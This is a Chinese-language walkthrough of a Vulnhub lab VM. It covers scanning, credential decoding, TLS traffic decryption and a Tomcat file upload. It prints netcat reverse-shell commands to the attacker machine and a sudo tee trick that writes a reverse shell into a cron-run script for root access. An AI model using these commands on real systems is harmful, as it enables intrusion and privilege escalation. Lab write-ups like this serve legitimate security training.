0x00 环境配置
该靶机使用了静态IP地址(192.168.110.140),我们需要配置虚拟机的网络。打开VMware,点击最上面一栏“编辑”→“虚拟网络编辑器”
![【渗透测试】Vulnhub 1.0通关手册]( "【渗透测试】Vulnhub 1.0通关手册")
添加一条网络,选择nat模式,子网地址192.168.110.0,子网掩码255.255.255.0,打开虚拟机的网络设置,选择自定义模式,使用刚刚配置好的nat模式的网卡。攻击机Kali也使用同样的方法配置。
![【渗透测试】Vulnhub 1.0通关手册]( "【渗透测试】Vulnhub 1.0通关手册")
0x01信息搜集
首先扫描靶机的IP地址
1.可以使用arp-scan
![【渗透测试】Vulnhub 1.0通关手册]( "【渗透测试】Vulnhub 1.0通关手册")
2.可以用nmap扫描C段
![【渗透测试】Vulnhub 1.0通关手册]( "【渗透测试】Vulnhub 1.0通关手册")
3.可以使用fping扫描C段
![【渗透测试】Vulnhub 1.0通关手册]( "【渗透测试】Vulnhub 1.0通关手册")
扫描服务器的端口
![【渗透测试】Vulnhub 1.0通关手册]( "【渗透测试】Vulnhub 1.0通关手册")
发现开启了很多很多端口,做了端口混淆。我们可以使用隐蔽扫描
![【渗透测试】Vulnhub 1.0通关手册]( "【渗透测试】Vulnhub 1.0通关手册")
扫描服务器指纹信息
nmap 192.168.110.140 -O whatweb 192.168.110.140
![【渗透测试】Vulnhub 1.0通关手册]( "【渗透测试】Vulnhub 1.0通关手册")
0x02 漏洞挖掘
访问web页面,查看源代码。发现了一处注释,是两次base64编码后的结果。
![【渗透测试】Vulnhub 1.0通关手册]( "【渗透测试】Vulnhub 1.0通关手册")
也可以使用命令解码
echo "Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo" | base64 -d | base64 -d
![【渗透测试】Vulnhub 1.0通关手册]( "【渗透测试】Vulnhub 1.0通关手册")
查看源码发现一个页面,点进去进入到一个邮箱登录页面。用刚刚两次base64解码的账号密码登录。
![【渗透测试】Vulnhub 1.0通关手册]( "【渗透测试】Vulnhub 1.0通关手册")
在邮件中发现了包含ssl证书的秘钥文件
![【渗透测试】Vulnhub 1.0通关手册]( "【渗透测试】Vulnhub 1.0通关手册")
发现了红队攻击的流量包文件
![【渗透测试】Vulnhub 1.0通关手册]( "【渗透测试】Vulnhub 1.0通关手册")
发现了解密ssl证书的字符串
![【渗透测试】Vulnhub 1.0通关手册]( "【渗透测试】Vulnhub 1.0通关手册")
从秘钥库导出.p12证书
keytool -list -keystore keystore
导出名为admin.p12的文件
keytool -importkeystore -srckeystore keystore -destkeystore admin.p12 -deststoretype pkcs12
![【渗透测试】Vulnhub 1.0通关手册]( "【渗透测试】Vulnhub 1.0通关手册")
打开wireshark进行解密
![【渗透测试】Vulnhub 1.0通关手册]( "【渗透测试】Vulnhub 1.0通关手册")
选择tls(旧版wireshark也叫ssl),填写靶机地址,解密证书路径,协议,端口,解密字符串
![【渗透测试】Vulnhub 1.0通关手册]( "【渗透测试】Vulnhub 1.0通关手册")
打开流量报文
![【渗透测试】Vulnhub 1.0通关手册]( "【渗透测试】Vulnhub 1.0通关手册")
即可看到解密后的流量包文,过滤出http请求,选择追踪http流
![【渗透测试】Vulnhub 1.0通关手册]( "【渗透测试】Vulnhub 1.0通关手册")
发现攻击者登录的路径及账号密码
![【渗透测试】Vulnhub 1.0通关手册]( "【渗透测试】Vulnhub 1.0通关手册")
进行base64解密
![【渗透测试】Vulnhub 1.0通关手册]( "【渗透测试】Vulnhub 1.0通关手册")
登陆Tomcat后台,注意:直接登陆登不进,不知道为什么,要用burpsuite进行一次代理
![【渗透测试】Vulnhub 1.0通关手册]( "【渗透测试】Vulnhub 1.0通关手册")
成功登陆,发现任意文件上传漏洞
![【渗透测试】Vulnhub 1.0通关手册]( "【渗透测试】Vulnhub 1.0通关手册")
0x03 操作系统提权
上传webshell,可以直接上传大马,然后再进行NC反弹(因为靶机有查杀webshell的工具,每隔一段时间就会清空webshell)。我这里没找到合适的大马,就用了冰蝎(加密传输,所以靶机没有杀掉webshell,为了演示,我们依旧进行nc反弹)。冰蝎依旧进行了本地代理,不然连接不上
![【渗透测试】Vulnhub 1.0通关手册]( "【渗透测试】Vulnhub 1.0通关手册")
反弹到kali
Kali端监听nc反弹到端口,我们用4444端口
冰蝎端执行反弹命令
nc -nv 192.168.110.128 -c /bin/bash
KALI接收到反弹,我们用Python写一个交互式的shell
python -c 'import pty:;pty.spawn("/bin/bash")'
![【渗透测试】Vulnhub 1.0通关手册]( "【渗透测试】Vulnhub 1.0通关手册")
在网站的目录下存在着连接数据库的账号密码,数据库里包含了登录靶机的口令
![【渗透测试】Vulnhub 1.0通关手册]( "【渗透测试】Vulnhub 1.0通关手册")
数据库是空密码,进入数据库
mysql -u root -p show databases; use mysql; show tables; select * from users;
![【渗透测试】Vulnhub 1.0通关手册]( "【渗透测试】Vulnhub 1.0通关手册")
把密码进行MD5解密得到“thelaststraw”,直接登陆靶机
![【渗透测试】Vulnhub 1.0通关手册]( "【渗透测试】Vulnhub 1.0通关手册")
用history命令看到用户提权到blumbergh用户的记录。该用户密码保存在images目录下的图片里,可以用strings命令查看,在bill.png发现了隐藏的密码
![【渗透测试】Vulnhub 1.0通关手册]( "【渗透测试】Vulnhub 1.0通关手册")
登录
![【渗透测试】Vulnhub 1.0通关手册]( "【渗透测试】Vulnhub 1.0通关手册")
发现支持以sudo权限运行的脚本
![【渗透测试】Vulnhub 1.0通关手册]( "【渗透测试】Vulnhub 1.0通关手册")
利用该脚本进行提权,创建一个反弹命令的TXT文件
echo"nc 192.168.110.128 4444 -e /bin/bash" >>shell.txt
kali端先开启监听
将该文本写入到支持sudo执行的脚本中去,从而使用root用户执行反弹命令
cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh
由于该脚本2分钟执行一次,所以kali端执行命令不能第一时间接收到反馈,等等就好。生成交互式shell,拿下主机root权限
![【渗透测试】Vulnhub 1.0通关手册]( "【渗透测试】Vulnhub 1.0通关手册")
备注:
靶场下载地址发在我们的官方知识星球:暗魂攻防实验室(稍后会在知识星球发布百度网盘下载地址)
官方下载地址:
评论